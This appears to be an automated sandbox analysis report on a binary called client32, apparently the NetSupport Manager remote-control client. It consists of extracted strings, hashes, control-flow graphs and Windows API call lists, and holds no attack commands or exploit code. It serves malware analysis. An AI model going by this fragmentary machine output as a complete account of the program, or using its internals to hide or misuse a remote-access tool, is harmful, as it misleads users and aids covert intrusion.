                                                                                                                • String ID: *BeepSound$*BeepUsingSpeaker$*ListenPort$*PriorityClass$*ScreenScrape$*StartupDelay$124406$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$CabinetWClass$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$Found new explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$Found old explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$General$Global\NSMWClassAdmin$IKS.LIC$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$Intel(r)$IsILS returned %d, isvistaservice %d$IsJPIK returned %d, isvistaservice %d$JPK$LSPloaded=%d, WFPloaded=%d$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NeedsReinstall$NoFTWhenLoggedOff$OS2$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TCPIP$TraceIPC$TracePriv$Unsupported Platform$UseIPC$UseLegacyPrintCapture$UseNTSecurity$V12.00.20$V12.10.20$View$Windows 10$Windows 10 x64$Windows 2000$Windows 2003$Windows 2003 x64$Windows 2008$Windows 2008 x64$Windows 2012$Windows 2012 R2$Windows 2016$Windows 7$Windows 7 x64$Windows 8$Windows 8 x64$Windows 8.1$Windows 8.1 x64$Windows 95$Windows 98$Windows CE$Windows Ding.wav$Windows Millennium$Windows NT$Windows Vista$Windows Vista x64$Windows XP$Windows XP Ding.wav$Windows XP x64$\Explorer.exe$_debug$_debug$cl32main$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaService$istaUI$pcicl32$win8ui
                                                                                                                • API String ID: 372548862-3590453207
                                                                                                                • Opcode ID: ff6231982a083b7ef807ca73d3ddae56e174acd57833a54bc83ec0c4d0681142
                                                                                                                • Instruction ID: 381c96219eccee67eae21d9e39560490d5bedbb063d23e5a2fc42920cd5923e4
                                                                                                                • Opcode Fuzzy Hash: ff6231982a083b7ef807ca73d3ddae56e174acd57833a54bc83ec0c4d0681142
                                                                                                                • Instruction Fuzzy Hash: 39F2F978E0226A9FE715CBA0CC94FADF7A5BB4870CF504468F925B72C8DB706940CB56

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1052 1102e0d0-1102e120 call 111101b0 1055 1102e122-1102e136 call 11143630 1052->1055 1056 1102e138 1052->1056 1058 1102e13e-1102e183 call 11142e60 call 11143690 1055->1058 1056->1058 1064 1102e323-1102e332 call 11145990 1058->1064 1065 1102e189 1058->1065 1071 1102e338-1102e348 1064->1071 1067 1102e190-1102e193 1065->1067 1068 1102e195-1102e197 1067->1068 1069 1102e1b8-1102e1c1 1067->1069 1072 1102e1a0-1102e1b1 1068->1072 1073 1102e1c7-1102e1ce 1069->1073 1074 1102e2f4-1102e30d call 11143690 1069->1074 1075 1102e34a 1071->1075 1076 1102e34f-1102e363 call 1102d360 1071->1076 1072->1072 1086 1102e1b3 1072->1086 1073->1074 1077 1102e2c3-1102e2d8 call 11163ca7 1073->1077 1078 1102e1d5-1102e1d7 1073->1078 1079 1102e2da-1102e2ef call 11163ca7 1073->1079 1080 1102e26a-1102e29d call 11162777 call 11142e60 1073->1080 1081 1102e2ab-1102e2c1 call 11164ed0 1073->1081 1082 1102e25b-1102e265 1073->1082 1083 1102e29f-1102e2a9 1073->1083 1084 1102e21c-1102e222 1073->1084 1085 1102e24c-1102e256 1073->1085 1074->1067 1101 1102e313-1102e315 1074->1101 1075->1076 1098 1102e368-1102e36d 1076->1098 1077->1074 1078->1074 1093 1102e1dd-1102e217 call 11162777 call 11142e60 call 1102d360 1078->1093 1079->1074 1080->1074 1081->1074 1082->1074 1083->1074 1095 1102e224-1102e238 call 11163ca7 1084->1095 1096 1102e23d-1102e247 1084->1096 1085->1074 1086->1074 1093->1074 1095->1074 1096->1074 1106 1102e413-1102e42d call 11146fe0 1098->1106 1107 1102e373-1102e398 call 110b7df0 call 11147060 1098->1107 1101->1106 1109 1102e31b-1102e321 1101->1109 1121 1102e483-1102e48f call 1102bc40 1106->1121 1122 1102e42f-1102e448 call 1105e820 1106->1122 1128 1102e3a3-1102e3a9 1107->1128 1129 1102e39a-1102e3a1 1107->1129 1109->1064 1109->1071 1131 1102e491-1102e498 1121->1131 1132 1102e468-1102e46f 1121->1132 1122->1121 1135 1102e44a-1102e45c 1122->1135 1133 1102e3ab-1102e3b2 call 11028360 1128->1133 1134 1102e409 1128->1134 1129->1106 1136 1102e475-1102e478 1131->1136 1137 1102e49a-1102e4a4 1131->1137 1132->1136 1139 1102e67a-1102e69b GetComputerNameA 1132->1139 1133->1134 1150 1102e3b4-1102e3e6 1133->1150 1134->1106 1135->1121 1149 1102e45e 1135->1149 1142 1102e47a-1102e481 call 110b7df0 1136->1142 1143 1102e4a9 1136->1143 1137->1139 1144 1102e6d3-1102e6d9 1139->1144 1145 1102e69d-1102e6d1 call 11028230 1139->1145 1148 1102e4ac-1102e586 call 11027f40 call 110281e0 call 11027f40 * 2 LoadLibraryA GetProcAddress 1142->1148 1143->1148 1146 1102e6db-1102e6e0 1144->1146 1147 1102e70f-1102e722 call 11164ed0 1144->1147 1145->1144 1171 1102e727-1102e733 1145->1171 1152 1102e6e6-1102e6ea 1146->1152 1167 1102e917-1102e93a 1147->1167 1199 1102e64a-1102e652 SetLastError 1148->1199 1200 1102e58c-1102e5a3 1148->1200 1149->1132 1165 1102e3f0-1102e3ff call 110f64d0 1150->1165 1166 1102e3e8-1102e3ee 1150->1166 1157 1102e706-1102e708 1152->1157 1158 1102e6ec-1102e6ee 1152->1158 1168 1102e70b-1102e70d 1157->1168 1163 1102e702-1102e704 1158->1163 1164 1102e6f0-1102e6f6 1158->1164 1163->1168 1164->1157 1172 1102e6f8-1102e700 1164->1172 1173 1102e402-1102e404 call 1102d900 1165->1173 1166->1165 1166->1173 1185 1102e962-1102e96a 1167->1185 1186 1102e93c-1102e942 1167->1186 1168->1147 1168->1171 1179 1102e735-1102e74a call 110b7df0 call 1102a1f0 1171->1179 1180 1102e74c-1102e75f call 11081d30 1171->1180 1172->1152 1172->1163 1173->1134 1208 1102e7a3-1102e7bc call 11081d30 1179->1208 1197 1102e761-1102e784 1180->1197 1198 1102e786-1102e788 1180->1198 1189 1102e97c-1102ea08 call 11162777 * 2 call 11147060 * 2 GetCurrentProcessId call 110ee150 call 11028290 call 11147060 call 11162bb7 1185->1189 1190 1102e96c-1102e979 call 11036710 call 11162777 1185->1190 1186->1185 1188 1102e944-1102e95d call 1102d900 1186->1188 1188->1185 1190->1189 1197->1208 1201 1102e790-1102e7a1 1198->1201 1206 1102e613-1102e61f 1199->1206 1200->1206 1221 1102e5a5-1102e5ae 1200->1221 1201->1201 1201->1208 1214 1102e662-1102e671 1206->1214 1215 1102e621-1102e62d 1206->1215 1224 1102e7c2-1102e83d call 11147060 call 110cfe80 call 110d16d0 call 110b7df0 wsprintfA call 110b7df0 wsprintfA 1208->1224 1225 1102e8fc-1102e909 call 11164ed0 1208->1225 1214->1139 1222 1102e673-1102e674 FreeLibrary 1214->1222 1218 1102e63f-1102e643 1215->1218 1219 1102e62f-1102e63d GetProcAddress 1215->1219 1227 1102e654-1102e656 SetLastError 1218->1227 1228 1102e645-1102e648 1218->1228 1219->1218 1221->1206 1226 1102e5b0-1102e5e6 call 11147060 call 1112c1b0 1221->1226 1222->1139 1264 1102e853-1102e869 call 11129e00 1224->1264 1265 1102e83f-1102e84e call 11029a70 1224->1265 1243 1102e90c-1102e911 CharUpperA 1225->1243 1226->1206 1249 1102e5e8-1102e60e call 11147060 call 11027f80 1226->1249 1230 1102e65c 1227->1230 1228->1230 1230->1214 1243->1167 1249->1206 1269 1102e882-1102e8bc call 110d0e20 * 2 1264->1269 1270 1102e86b-1102e87d call 110d0e20 1264->1270 1265->1264 1277 1102e8d2-1102e8fa call 11164ed0 call 110d0a10 1269->1277 1278 1102e8be-1102e8cd call 11029a70 1269->1278 1270->1269 1277->1243 1278->1277
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _malloc_memsetwsprintf
                                                                                                                • String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$124406$18/11/16 11:28:14 V12.10F20$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSM.LIC$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                                                • API String ID: 3802068140-2942280555
                                                                                                                • Opcode ID: eeddba07d7e6520cef25e5c7574d70c0732ba69d7c4c0694e1ffbbd3a2b399ab
                                                                                                                • Instruction ID: ec88a390f79512b50aba7168cc31da78705c53b3cca2911266f0d70c00f4e6f9
                                                                                                                • Opcode Fuzzy Hash: eeddba07d7e6520cef25e5c7574d70c0732ba69d7c4c0694e1ffbbd3a2b399ab
                                                                                                                • Instruction Fuzzy Hash: 8232B175D4127A9FDB22CF90CC84BEDB7B8BB44308F8445E9E559A7280EB706E84CB51

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1704 11144140-11144181 GetModuleFileNameA 1705 111441c3 1704->1705 1706 11144183-11144196 call 11081e00 1704->1706 1707 111441c9-111441cd 1705->1707 1706->1705 1715 11144198-111441c1 LoadLibraryA 1706->1715 1709 111441cf-111441dc LoadLibraryA 1707->1709 1710 111441e9-11144207 GetModuleHandleA GetProcAddress 1707->1710 1709->1710 1712 111441de-111441e6 LoadLibraryA 1709->1712 1713 11144217-11144240 GetProcAddress * 4 1710->1713 1714 11144209-11144215 1710->1714 1712->1710 1716 11144243-111442bb GetProcAddress * 10 call 11162bb7 1713->1716 1714->1716 1715->1707 1718 111442c0-111442c3 1716->1718
                                                                                                                APIs
                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,8504C483,771B23A0), ref: 11144173
                                                                                                                • LoadLibraryA.KERNEL32(?), ref: 111441BC
                                                                                                                • LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 111441D5
                                                                                                                • LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 111441E4
                                                                                                                • GetModuleHandleA.KERNEL32(?), ref: 111441EA
                                                                                                                • GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 111441FE
                                                                                                                • GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1114421D
                                                                                                                • GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 11144228
                                                                                                                • GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 11144233
                                                                                                                • GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1114423E
                                                                                                                • GetProcAddress.KERNEL32(00000000,StackWalk), ref: 11144249
                                                                                                                • GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 11144254
                                                                                                                • GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1114425F
                                                                                                                • GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1114426A
                                                                                                                • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 11144275
                                                                                                                • GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 11144280
                                                                                                                • GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 1114428B
                                                                                                                • GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 11144296
                                                                                                                • GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 111442A1
                                                                                                                • GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 111442AC
                                                                                                                  • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
                                                                                                                • String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
                                                                                                                • API String ID: 3874234733-2061581830
                                                                                                                • Opcode ID: 57b4066cb2a569ca058a5d5f8073bc193ef12f36e95607c0665d50404da9b0c4
                                                                                                                • Instruction ID: c7cebb5ad097969c59afa36c8b157edb2e0deacaa1fcee2d42955e2ce7c14d1b
                                                                                                                • Opcode Fuzzy Hash: 57b4066cb2a569ca058a5d5f8073bc193ef12f36e95607c0665d50404da9b0c4
                                                                                                                • Instruction Fuzzy Hash: 74416174A40704AFDB289F769D84E6BFBF8FF55B18B50492EE445D3A00EB74E8008B59

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1719 110aa170-110aa1d2 LoadLibraryA GetProcAddress 1720 110aa1d8-110aa1e9 SetupDiGetClassDevsA 1719->1720 1721 110aa2e5-110aa2ed SetLastError 1719->1721 1722 110aa1ef-110aa1fd 1720->1722 1723 110aa3f3-110aa3f5 1720->1723 1727 110aa2f9-110aa2fb SetLastError 1721->1727 1724 110aa200-110aa204 1722->1724 1725 110aa3fe-110aa400 1723->1725 1726 110aa3f7-110aa3f8 FreeLibrary 1723->1726 1728 110aa21d-110aa235 1724->1728 1729 110aa206-110aa217 GetProcAddress 1724->1729 1730 110aa417-110aa432 call 11162bb7 1725->1730 1726->1725 1731 110aa301-110aa30c GetLastError 1727->1731 1728->1731 1742 110aa23b-110aa23d 1728->1742 1729->1727 1729->1728 1733 110aa312-110aa31d call 11163aa5 1731->1733 1734 110aa3a0-110aa3b1 GetProcAddress 1731->1734 1733->1724 1735 110aa3bb-110aa3bd SetLastError 1734->1735 1736 110aa3b3-110aa3b9 SetupDiDestroyDeviceInfoList 1734->1736 1741 110aa3c3-110aa3c5 1735->1741 1736->1741 1741->1723 1743 110aa3c7-110aa3e9 CreateFileA 1741->1743 1744 110aa248-110aa24a 1742->1744 1745 110aa23f-110aa245 call 11163aa5 1742->1745 1746 110aa3eb-110aa3f0 call 11163aa5 1743->1746 1747 110aa402-110aa40c call 11163aa5 1743->1747 1749 110aa24c-110aa25f GetProcAddress 1744->1749 1750 110aa265-110aa27b 1744->1750 1745->1744 1746->1723 1759 110aa40e-110aa40f FreeLibrary 1747->1759 1760 110aa415 1747->1760 1749->1750 1753 110aa322-110aa32a SetLastError 1749->1753 1755 110aa27d-110aa286 GetLastError 1750->1755 1761 110aa28c-110aa29f call 11163a11 1750->1761 1753->1755 1755->1761 1762 110aa361-110aa372 call 110aa110 1755->1762 1759->1760 1760->1730 1767 110aa382-110aa393 call 110aa110 1761->1767 1768 110aa2a5-110aa2ad 1761->1768 1769 110aa37b-110aa37d 1762->1769 1770 110aa374-110aa375 FreeLibrary 1762->1770 1767->1769 1776 110aa395-110aa39e FreeLibrary 1767->1776 1771 110aa2af-110aa2c2 GetProcAddress 1768->1771 1772 110aa2c4-110aa2db 1768->1772 1769->1730 1770->1769 1771->1772 1775 110aa32f-110aa331 SetLastError 1771->1775 1777 110aa337-110aa351 call 110aa110 call 11163aa5 1772->1777 1780 110aa2dd-110aa2e0 1772->1780 1775->1777 1776->1730 1777->1769 1784 110aa353-110aa35c FreeLibrary 1777->1784 1780->1724 1784->1730
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(setupapi.dll,0BAD89F8,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000,111856D8), ref: 110AA1A3
                                                                                                                • GetProcAddress.KERNEL32(00000000,SetupDiGetClassDevsA), ref: 110AA1C7
                                                                                                                • SetupDiGetClassDevsA.SETUPAPI(111A7EDC,00000000,00000000,00000012,?,?,?,?,?,?,?,?,?,00000000,111856D8,000000FF), ref: 110AA1E1
                                                                                                                • GetProcAddress.KERNEL32(00000000,SetupDiEnumDeviceInterfaces), ref: 110AA20C
                                                                                                                • _free.LIBCMT ref: 110AA240
                                                                                                                • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110AA252
                                                                                                                • GetLastError.KERNEL32 ref: 110AA27D
                                                                                                                • _malloc.LIBCMT ref: 110AA293
                                                                                                                • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110AA2B5
                                                                                                                • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,00000000,111856D8,000000FF,?,1102F855,Client), ref: 110AA2E7
                                                                                                                • SetLastError.KERNEL32(00000078), ref: 110AA2FB
                                                                                                                • GetLastError.KERNEL32 ref: 110AA301
                                                                                                                • _free.LIBCMT ref: 110AA313
                                                                                                                • SetLastError.KERNEL32(00000078), ref: 110AA324
                                                                                                                • SetLastError.KERNEL32(00000078), ref: 110AA331
                                                                                                                • _free.LIBCMT ref: 110AA344
                                                                                                                • FreeLibrary.KERNEL32(?,?), ref: 110AA354
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,111856D8,000000FF,?,1102F855,Client), ref: 110AA3F8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$AddressProc$Library_free$Free$ClassDevsLoadSetup_malloc
                                                                                                                • String ID: SetupDiDestroyDeviceInfoList$SetupDiEnumDeviceInterfaces$SetupDiGetClassDevsA$SetupDiGetDeviceInterfaceDetailA$setupapi.dll
                                                                                                                • API String ID: 3464732724-3340099623
                                                                                                                • Opcode ID: dbc8acc033e5e24f37873c07638d6d638064cee8c874e7b38a73b383613d7029
                                                                                                                • Instruction ID: 5c4fa76f58df98f84a8804f3b2f927c1121c913996f050c4ed1f836ab53a5840
                                                                                                                • Opcode Fuzzy Hash: dbc8acc033e5e24f37873c07638d6d638064cee8c874e7b38a73b383613d7029
                                                                                                                • Instruction Fuzzy Hash: CE818472D40219EBEB04DFE4ED88F9EBBB8AF44704F104528F922A76C4DB759945CB50

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1981 11134830-1113486c 1982 11134872-11134894 call 1105e820 1981->1982 1983 11134b94-11134baf call 11162bb7 1981->1983 1982->1983 1988 1113489a-111348ae GetLocalTime 1982->1988 1989 111348d1-11134953 LoadLibraryA call 11009940 call 110161e0 GetCurrentProcess 1988->1989 1990 111348b0-111348cc call 11147060 1988->1990 1997 11134955-1113496b GetProcAddress 1989->1997 1998 1113496d-11134974 GetProcessHandleCount 1989->1998 1990->1989 1997->1998 1999 11134976-11134978 SetLastError 1997->1999 2000 1113497e-11134986 1998->2000 1999->2000 2001 111349a2-111349ae 2000->2001 2002 11134988-111349a0 GetProcAddress 2000->2002 2005 111349b0-111349c8 GetProcAddress 2001->2005 2007 111349ca-111349d5 2001->2007 2002->2001 2003 111349d7-111349e2 SetLastError 2002->2003 2003->2005 2006 111349e4-111349ec SetLastError 2005->2006 2005->2007 2008 111349ef-111349ff GetProcAddress 2006->2008 2007->2008 2010 11134a01-11134a0d K32GetProcessMemoryInfo 2008->2010 2011 11134a0f-11134a11 SetLastError 2008->2011 2012 11134a17-11134a25 2010->2012 2011->2012 2013 11134a33-11134a3e 2012->2013 2014 11134a27-11134a2f 2012->2014 2015 11134a40-11134a48 2013->2015 2016 11134a4c-11134a57 2013->2016 2014->2013 2015->2016 2017 11134a65-11134a6f 2016->2017 2018 11134a59-11134a61 2016->2018 2019 11134a71-11134a78 2017->2019 2020 11134a7a-11134a7d 2017->2020 2018->2017 2021 11134a7f-11134a8d call 11147060 2019->2021 2020->2021 2022 11134a90-11134aa2 2020->2022 2021->2022 2026 11134b6a-11134b78 2022->2026 2027 11134aa8-11134aba call 110642e0 2022->2027 2028 11134b7a-11134b7b FreeLibrary 2026->2028 2029 11134b7d-11134b85 2026->2029 2027->2026 2035 11134ac0-11134ae1 call 1105e820 2027->2035 2028->2029 2031 11134b87-11134b88 FreeLibrary 2029->2031 2032 11134b8a-11134b8f 2029->2032 2031->2032 2032->1983 2034 11134b91-11134b92 FreeLibrary 2032->2034 2034->1983 2038 11134ae3-11134ae9 2035->2038 2039 11134aef-11134b0b call 1105e820 2035->2039 2038->2039 2040 11134aeb 2038->2040 2043 11134b16-11134b32 call 1105e820 2039->2043 2044 11134b0d-11134b10 2039->2044 2040->2039 2048 11134b34-11134b37 2043->2048 2049 11134b3d-11134b59 call 1105e820 2043->2049 2044->2043 2045 11134b12 2044->2045 2045->2043 2048->2049 2050 11134b39 2048->2050 2053 11134b60-11134b63 2049->2053 2054 11134b5b-11134b5e 2049->2054 2050->2049 2053->2026 2055 11134b65 call 11027de0 2053->2055 2054->2053 2054->2055 2055->2026
                                                                                                                APIs
                                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                • GetLocalTime.KERNEL32(?,_debug,CheckLeaks,00000001,00000000,0BAD89F8), ref: 1113489E
                                                                                                                • LoadLibraryA.KERNEL32(psapi.dll), ref: 111348F6
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 11134937
                                                                                                                • GetProcAddress.KERNEL32(?,GetProcessHandleCount), ref: 11134961
                                                                                                                • GetProcessHandleCount.KERNEL32(00000000,?), ref: 11134972
                                                                                                                • SetLastError.KERNEL32(00000078), ref: 11134978
                                                                                                                • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11134994
                                                                                                                • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 111349BC
                                                                                                                • SetLastError.KERNEL32(00000078), ref: 111349D9
                                                                                                                • SetLastError.KERNEL32(00000078), ref: 111349E6
                                                                                                                • GetProcAddress.KERNEL32(?,GetProcessMemoryInfo), ref: 111349F8
                                                                                                                • K32GetProcessMemoryInfo.KERNEL32(?,?,00000028), ref: 11134A0B
                                                                                                                • SetLastError.KERNEL32(00000078), ref: 11134A11
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 11134B7B
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 11134B88
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 11134B92
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
